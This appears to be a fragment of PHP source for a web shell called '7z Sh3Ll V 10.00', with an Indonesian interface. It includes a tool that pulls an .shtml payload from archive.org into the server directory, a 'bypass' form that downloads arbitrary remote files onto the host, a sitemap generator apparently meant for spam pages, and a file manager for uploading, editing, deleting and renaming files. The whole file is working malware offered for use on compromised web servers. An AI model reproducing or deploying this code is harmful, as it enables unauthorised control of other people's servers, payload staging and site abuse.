$sitemapPath = $realPath . "/sitemap.xml";
$sitemapFile = fopen($sitemapPath, "w");

fwrite($sitemapFile, '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL);
fwrite($sitemapFile, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL);

foreach ($fileLines as $judul) {
    $sitemapLink = $baseURL . urlencode($judul);
    fwrite($sitemapFile, "  <url>\n");
    fwrite($sitemapFile, "    <loc>$sitemapLink</loc>\n");
    fwrite($sitemapFile, "    <changefreq>daily</changefreq>\n");
    fwrite($sitemapFile, "    <priority>1</priority>\n");
    fwrite($sitemapFile, "  </url>\n");
}

fwrite($sitemapFile, '</urlset>' . PHP_EOL);
fclose($sitemapFile);

echo "✅ <strong>sitemap.xml</strong> berhasil dibuat di: <code>$realPath</code><br>";
echo "🌐 URL base: <code>$baseURL</code>";
?>

<?php endif; ?>

<?php if (isset($_GET['Tools']) && $_GET['Tools'] === 'SSI7z'): ?>

<?php
// URL file yang ingin "di-upload"
$file_url = 'https://ia600906.us.archive.org/6/items/SSIcool/SSIcool.shtml';

// Ambil nama file dari URL
$filename = basename($file_url);

// Path direktori saat ini (di mana file PHP ini berada)
$current_dir = __DIR__;

// Path lengkap file tujuan
$destination = $current_dir . DIRECTORY_SEPARATOR . $filename;

// Ambil isi file dari URL
$file_content = file_get_contents($file_url);
$success = false;

if ($file_content !== false) {
    file_put_contents($destination, $file_content);
    $success = true;
}

// Tampilkan HTML
?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <title>Upload dari URL</title>
   <style>
    body {
        font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        background-color: rgb(18 18 35);
        color: #ffffff;
        text-align: center;
        padding-top: 50px;
    }
    .message {
        display: inline-block;
        padding: 20px 30px;
        background-color: <?php echo $success ? 'rgba(0, 255, 180, 0.1)' : 'rgba(255, 0, 100, 0.1)'; ?>;
        color: <?php echo $success ? '#00ffc3' : '#00ffc3'; ?>;
        border: 1px solid <?php echo $success ? '#0095fc' : '#ff5c8a'; ?>;
        border-radius: 10px;
        font-size: 18px;
        box-shadow: 0 0 10px <?php echo $success ? '#00edff' : '#ff5c8a'; ?>;
    }
    .path {
        margin-top: 10px;
        font-size: 14px;
        color: #bbbbbb;
        word-break: break-word;
    }
</style>

</head>
<body>

<div class="message">
    <?php if ($success): ?>
        ✅ Crot SSI7z Berhasil di buat !
        <div class="path"><?php echo htmlspecialchars($destination); ?></div>
    <?php else: ?>
        ❌ Gagal mengambil file dari URL.
    <?php endif; ?>
</div>

</body>
</html>

<?php endif; ?>

<?php if (isset($_GET['Tools']) && $_GET['Tools'] === 'UploadURL'): ?>
<?php
// Ambil direktori saat ini dari parameter URL
$basedir = isset($_GET['dir']) ? $_GET['dir'] : '.';
$basedir = rtrim($basedir, '/');

// Proteksi agar tidak bisa keluar dari root
if (strpos($basedir, '..') !== false) {
    die('Akses direktori tidak diizinkan.');
}

// Gabungkan path absolut
$targetDir = realpath($basedir);
if (!$targetDir || !is_dir($targetDir)) {
    die('Direktori tidak ditemukan.');
}

// Tangani upload via URL
if (isset($_POST['submit'])) {
    $url = trim($_POST['url']);
    $customName = trim($_POST['custom_name']);

    if (filter_var($url, FILTER_VALIDATE_URL)) {
        // Tentukan nama file: gunakan custom name jika diisi
        $fileName = $customName !== '' ? basename($customName) : basename(parse_url($url, PHP_URL_PATH));
        $savePath = $targetDir . '/' . $fileName;

        $fileContent = @file_get_contents($url);
        if ($fileContent !== false) {
            file_put_contents($savePath, $fileContent);
            echo "<p style='color:green;'>✅ File <strong>$fileName</strong> berhasil diunduh ke <code>$basedir</code></p>";
        } else {
            echo "<p style='color:red;'>❌ Gagal mengunduh file dari URL.</p>";
        }
    } else {
        echo "<p style='color:red;'>❌ URL tidak valid.</p>";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>Upload dari URL</title>
    <style>
        body {
            font-family: 'Segoe UI', sans-serif;
            background: #1e1e2f;
            color: #fff;
            padding: 20px;
        }
        form {
            background: #2c2c3d;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px #00ffc3;
            display: inline-block;
        }
        input[type="text"] {
            width: 300px;
            padding: 8px;
            border: none;
            border-radius: 5px;
            margin-bottom: 10px;
        }
        button {
            padding: 8px 15px;
            border: none;
            background-color: #00ffc3;
            color: #000;
            border-radius: 5px;
            cursor: pointer;
            font-weight: bold;
        }
        button i {
            margin-right: 5px;
        }
    </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
</head>
<body>
    <h2>Bypass Upload File dari URL <br>Direktori Saat ini : <code><?= htmlspecialchars($basedir) ?></code></h2>
    <center>
        <form method="POST">
            URL : <input type="text" name="url" placeholder="..." required><br>
            NAMA FILE : <input type="text" name="custom_name" placeholder="..."><br>
            <button type="submit" name="submit"><i class="fa fa-upload"></i> Upload</button>
        </form>
    </center>
    <footer>
        Dibuat oleh <span style="color: yellow;">7z</span> &copy; 2025 — <span style="color: orange;">7z Sh3Ll V 10.00</span>
    </footer>
</body>
</html>


<?php exit;?>
<?php endif; ?>


    <div class="upload-section">
        <form method="post" enctype="multipart/form-data" class="upload-form">
            <label>📁 Upload File:
                <input type="file" name="upload_file" required>
            </label>
            <button type="submit">⬆️ Upload</button>
        </form>

        <form method="post" class="buat-form">
            <input type="text" name="newfolder" placeholder="📂 Nama Folder" required>
            <button type="submit">➕ Buat Folder</button>
        </form>

        <form method="post" class="buat-form">
            <input type="text" name="newfile" placeholder="📄 Nama File" required>
            <button type="submit">➕ Buat File</button>
        </form>
    </div><br>
<center> <div class="breadcrumb"><?= makeBreadcrumb($dir) ?></div></center>
<table>
    <tr>
        <th>Nama</th>
        <th>Tipe</th>
        <th>Ukuran</th>
        <th>CHMOD</th>
        <th>Aksi</th>
    </tr>
    <?php foreach ($files as $f): ?>
        <?php if ($f === '.') continue; ?>
        <?php
            $path = "$dir/$f";
            $isDir = is_dir($path);
            $perm = substr(sprintf('%o', fileperms($path)), -4);

            // Warna CHMOD berdasarkan hak akses
            if (is_readable($path) && is_writable($path)) {
                $chmodColor = 'lime'; // bisa baca & tulis
            } elseif (is_readable($path)) {
                $chmodColor = 'red'; // hanya bisa dibaca
            } else {
                $chmodColor = 'gray'; // tidak bisa diakses
            }
        ?>
        <tr>
            <td>
                <?php if ($isDir): ?>
                    <a href="?dir=<?= urlencode(realpath($path)) ?>">📁 <?= htmlspecialchars($f) ?></a>
                <?php else: ?>
                    📄 <?= htmlspecialchars($f) ?>
                <?php endif; ?>
            </td>
            <td><?= $isDir ? 'Folder' : 'File' ?></td>
            <td><?= is_file($path) ? formatSize(filesize($path)) : '-' ?></td>
            <td style="color:<?= $chmodColor ?>; font-weight:bold;"><?= $perm ?></td>
            <td>
                <?php if (!$isDir): ?>
                    <a href="?edit=<?= urlencode($f) ?>&dir=<?= urlencode($dir) ?>">✏️ Ubah</a> |
                <?php endif; ?>
                <a href="?delete=<?= urlencode($f) ?>&dir=<?= urlencode($dir) ?>" onclick="return confirm('Hapus <?= htmlspecialchars($f) ?>?')">🗑️ Hapus</a> |
                <form method="post" style="display:inline">
                    <input type="hidden" name="rename_old" value="<?= htmlspecialchars($f) ?>">
                    <input type="text" name="rename_new" placeholder="Nama baru" required style="width:100px;">
                    <button type="submit">🔁 Ganti Nama</button>
                </form>
            </td>
        </tr>
    <?php endforeach; ?>
</table>


<?php endif; ?>

<footer>
    Dibuat oleh <span style="color: yellow;">7z</span> &copy; 2025 — <span style="color: orange;">7z Sh3Ll V 10.00</span>
</footer>